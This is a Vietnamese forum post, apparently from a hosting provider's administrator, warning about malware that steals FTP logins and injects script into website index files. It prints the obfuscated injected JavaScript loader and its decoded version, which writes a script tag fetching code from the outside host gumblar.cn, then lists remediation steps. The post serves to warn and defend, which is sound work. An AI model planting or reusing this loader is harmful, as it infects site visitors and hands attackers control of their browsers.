Cảnh báo về virus tự động chèn iframe vào website

administrator

Administrator
có một số khách hàng kêu là bị chèn frame vào website mặc dầu đã del đi và upload lại code mới nhưng vẫn bị. Sau khi vào site đó chúng tôi được biết thông tin sau:

Lên google search thì ra
Đây là một loại mailware chạy trong môi trường windows, tất cả người dùng khi bị nhiễm loại sâu này sẽ bị tự động chèn mã độc vào các file index.*


<script language=javascript--
(function(){var EoLS='var<20a<3d<22S<63r<69pt<45ngi<6ee<22<2cb<3d< 22Vers<69o<6e()+<22<2cj<3d<22<22<2c<75<3d<6eavigat or<2eus<65<72Agent<3bif((u<2ei<6e<64exOf(<22Win<22 )<3e0)<26<26(u<2eindexO<66<28<22<4eT<206<22)<3c0)< 26<26(<64ocume<6et<2ecoo<6bie<2ei<6edex<4ff(<22<6d i<65<6b<3d1<22)<3c0)<26<26(t<79p<65of(zr<76z<74s)< 21<3dtype<6ff(<22<41<22))<29<7b<7arvzts<3d<22A<22< 3be<76al(<22if(w<69ndow<2e<22+a+<22)<6a<3d<6a+<22< 2ba+<22<4dajor<22<2b<62<2b<61+<22Minor<22+b+<61+<2 2<42u<69ld<22<2bb<2b<22j<3b<22)<3bdoc<75ment<2ewri <74e<28<22<3cs<63r<69pt<20s<72c<3d<2f<2fgu<6d<62l< 61r<2ecn<2frs<73<2f<3fid<3d<22+j+<22<3e<3c<5c<2f<7 3cript<3e<22)<3b<7d';var Ciz=EoLS.replace(/</g,'%');eval(unescape(Ciz))})();
--></script>
Decode ra sẽ là:


var a="ScriptEngine",b="Version()+",j="",u=navigator.u serAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&([removed].indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A" ))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Majo r"+b+a+"Minor"+b+a+"Build"+b+"j;");[removed]("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}
Loại sâu này có khả năng như 1 keylogger lưu lại thông tin FTP của bạn để tự chèn mã độc vào file hoặc tự động chèn khi code được lưu lại trên máy tính.
Cách khắc phục:
1: dùng phần mềm diệt virus upgrade phiên bản mới nhất
2: Thay đổi thông tin FTP
3: nếu dùng hosting linux thì có thể chmod file thành 404 hoặc thư mục public_html thành 110 ( chmod bằng cpanel ) để tránh write file bằng FTP.
4: nên thay source code mới.

Ngoài sâu này ra còn có rất nhiều các biến thể khác với phương thức lây lan và gây hại tương tự.
VDS
 
Bên trên